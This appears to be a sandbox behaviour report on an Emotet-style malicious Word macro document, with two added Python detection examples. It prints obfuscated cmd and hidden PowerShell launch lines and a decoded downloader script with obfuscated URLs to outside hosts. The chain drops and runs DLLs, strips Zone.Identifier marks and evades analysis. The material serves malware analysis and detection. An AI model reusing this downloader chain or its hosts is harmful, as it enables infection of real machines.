Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2327249466.0000000002A60000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2327289380.0000000002B07000.00000004.00000040.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: N00048481397007.doc Stream path 'Macros/VBA/Gp0t5ucwnkng7fi' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gp0t5ucwnkng7fi Name: Gp0t5ucwnkng7fi
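The GOTO count above is a control-flow-flattening heuristic: a macro whose logic is scattered over labelled blocks joined by GoTo reads as a jump table rather than as straight-line code, which is what hides the real sequence of operations from a reader and from simple signature scanners. The Python below is an added example, not Joe Sandbox's own rule: it scores a module by the ratio of GoTo jumps to executable statements, ignores the ordinary `On Error GoTo` handler pattern, and reports jump targets that have no label. Both VBA modules inside it are constructed for illustration (the report names the module Gp0t5ucwnkng7fi but does not reproduce its source), and the thresholds are assumptions to be tuned on your own corpus.

```python
"""GoTo-density heuristic for VBA modules (added example, not Joe Sandbox's rule).
The two modules below are constructed; the report names module Gp0t5ucwnkng7fi
but does not show its source."""
import re
from typing import Dict

GOTO_RE = re.compile(r"(?<!On Error )\bGoTo\s+([A-Za-z_]\w*|\d+)", re.I)  # 'On Error GoTo x' is normal error handling
LABEL_RE = re.compile(r"^([A-Za-z_]\w*):\s*(?:'.*)?$")                   # a line that is only 'Label:' (numeric labels ignored)
MIN_GOTOS, MIN_RATIO = 5, 0.25   # assumed thresholds

OBFUSCATED = """
Sub AutoOpen()
    Dim s As String
    GoTo L3
L1:
    s = s & "m" & "s" & "g"
    GoTo L5
L2:
    Shell s, vbHide
    GoTo L6
L3:
    s = "cmd /c "
    GoTo L1
L4:
    Exit Sub
L5:
    s = s & " %username% /v"
    GoTo L2
L6:
    GoTo L4
End Sub
"""

BENIGN = """
Sub SaveReport()
    On Error GoTo Fail
    ActiveDocument.Save
    Exit Sub
Fail:
    MsgBox "Could not save: " & Err.Description
End Sub
"""


def goto_stats(vba: str) -> Dict[str, object]:
    """Count GoTo jumps, defined labels and executable statements; flag flattened control flow."""
    gotos, labels, statements = [], set(), 0
    for raw in vba.splitlines():
        line = raw.strip()
        if not line or line.startswith("'") or re.match(r"Rem\b", line, re.I):
            continue                                  # blank line or comment
        m = LABEL_RE.match(line)
        if m:
            labels.add(m.group(1).lower())
            continue
        statements += 1                               # one statement per line; ':' separators are ignored
        gotos += [t.lower() for t in GOTO_RE.findall(line)]
    ratio = len(gotos) / statements if statements else 0.0
    return {
        "gotos": len(gotos), "labels": len(labels), "statements": statements,
        "ratio": round(ratio, 2),
        "undefined_targets": sorted(set(gotos) - labels),
        "flag": len(gotos) >= MIN_GOTOS and ratio >= MIN_RATIO,
    }
```

Run it on the VBA text that olevba or a similar extractor gives you per module; the flattened module scores 6 jumps over 14 statements, the handler-only module scores zero.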
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043100B push ss; iretd 7_2_0043100C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0018F090 push edx; ret 7_2_0018F237
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0017057F push ss; iretd 7_2_00170580
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00482D98 push 00482E25h; ret 7_2_00482E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490020 push 00490058h; ret 7_2_00490050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00484038 push 00484064h; ret 7_2_0048405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045A0B4 push 0045A0E0h; ret 7_2_0045A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045A0B2 push 0045A0E0h; ret 7_2_0045A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B274 push 0045B2CDh; ret 7_2_0045B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0046C34C push 0046C378h; ret 7_2_0046C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E450 push ecx; mov dword ptr [esp], edx 7_2_0045E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004904F4 push 0049055Ch; ret 7_2_00490554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490498 push 004904EFh; ret 7_2_004904E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004905F0 push 0049063Ch; ret 7_2_00490634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0048B588 push 0048B5CAh; ret 7_2_0048B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490580 push 004905ACh; ret 7_2_004905A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004905B8 push 004905E4h; ret 7_2_004905DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00490654 push 00490680h; ret 7_2_00490678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004906C4 push 004906F0h; ret 7_2_004906E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045D6DC push 0045D751h; ret 7_2_0045D749
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E6F0 push ecx; mov dword ptr [esp], edx 7_2_0045E6F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0049068C push 004906B8h; ret 7_2_004906B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E696 push ecx; mov dword ptr [esp], edx 7_2_0045E69C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00458748 push 00458774h; ret 7_2_0045876C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045D754 push 0045D7ADh; ret 7_2_0045D7A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045E750 push ecx; mov dword ptr [esp], edx 7_2_0045E754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004907E4 push 00490827h; ret 7_2_0049081F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00458798 push 004587C4h; ret 7_2_004587BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004937A8 push 004937E0h; ret 7_2_004937D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00493848 push 00493874h; ret 7_2_0049386C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0049086C push 00490898h; ret 7_2_00490890

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Txroij\ohrhi.kon:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod:Zone.Identifier read attributes | delete
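The `read attributes | delete` opens above target the Zone.Identifier alternate data stream, the Mark of the Web that browsers and mail clients attach to downloads and that Office Protected View and SmartScreen consult; opening it with DELETE access is how the stream is removed, so the dropped payload afterwards looks locally created. The Python below is an added example, not part of the report or of Joe Sandbox: it parses the stream's `[ZoneTransfer]` section and reads it from a file by opening `<path>:Zone.Identifier`, which Python's open() hands to CreateFile unchanged and which therefore works only on NTFS under Windows; elsewhere, or once the malware has deleted the stream, the lookup returns None. The stream content embedded in it is constructed.

```python
"""Mark-of-the-Web check for a dropped file (added example, not Joe Sandbox code).
Reading the stream needs NTFS on Windows; the parser runs anywhere."""
import configparser
from typing import Dict, Optional

ZONE_NAMES = {"0": "LocalMachine", "1": "LocalIntranet", "2": "TrustedSites",
              "3": "Internet", "4": "RestrictedSites"}

# Constructed stream content, in the form a browser writes it for a download.
CONSTRUCTED_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                      "ReferrerUrl=https://example.invalid/\r\n"
                      "HostUrl=https://example.invalid/download.doc\r\n")


def parse_zone_identifier(stream_text: str) -> Dict[str, str]:
    """Parse the INI-style stream; {} when it has no [ZoneTransfer] section or is not INI at all."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                      # keep 'ZoneId' / 'HostUrl' capitalisation
    try:
        cp.read_string(stream_text)
    except configparser.Error:
        return {}
    return dict(cp.items("ZoneTransfer")) if cp.has_section("ZoneTransfer") else {}


def zone_name(info: Dict[str, str]) -> str:
    """Human-readable URL security zone for a parsed stream."""
    return ZONE_NAMES.get(info.get("ZoneId", ""), "unknown")


def read_zone_identifier(path: str) -> Optional[Dict[str, str]]:
    """Return the parsed Zone.Identifier stream of `path`, or None when it is absent
    (never marked, stripped by the malware, or a filesystem without streams)."""
    try:
        with open(path + ":Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


def came_from_internet(path: str) -> bool:
    """True only while the file still carries ZoneId 3 (Internet) or 4 (Restricted sites)."""
    info = read_zone_identifier(path)
    return info is not None and info.get("ZoneId") in ("3", "4")
```

On a live host, run `came_from_internet()` over the files the sandbox lists under C:\Windows\SysWOW64\<random>\; a payload that arrived via Word and PowerShell yet carries no stream is the artefact this signature describes, since a file written by a local process never had one, and a file whose stream was deleted looks identical after the fact.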
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (55 identical entries)
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (61 identical entries)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00433278 mov eax, dword ptr fs:[00000030h] 7_2_00433278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001727EC mov eax, dword ptr fs:[00000030h] 7_2_001727EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403278 mov eax, dword ptr fs:[00000030h] 8_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F27EC mov eax, dword ptr fs:[00000030h] 8_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283278 mov eax, dword ptr fs:[00000030h] 9_2_00283278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003427EC mov eax, dword ptr fs:[00000030h] 9_2_003427EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002B3278 mov eax, dword ptr fs:[00000030h] 10_2_002B3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E27EC mov eax, dword ptr fs:[00000030h] 10_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00403278 mov eax, dword ptr fs:[00000030h] 11_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C27EC mov eax, dword ptr fs:[00000030h] 11_2_001C27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001E3278 mov eax, dword ptr fs:[00000030h] 12_2_001E3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001627EC mov eax, dword ptr fs:[00000030h] 12_2_001627EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F27EC mov eax, dword ptr fs:[00000030h] 13_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001B3278 mov eax, dword ptr fs:[00000030h] 14_2_001B3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B27EC mov eax, dword ptr fs:[00000030h] 14_2_002B27EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
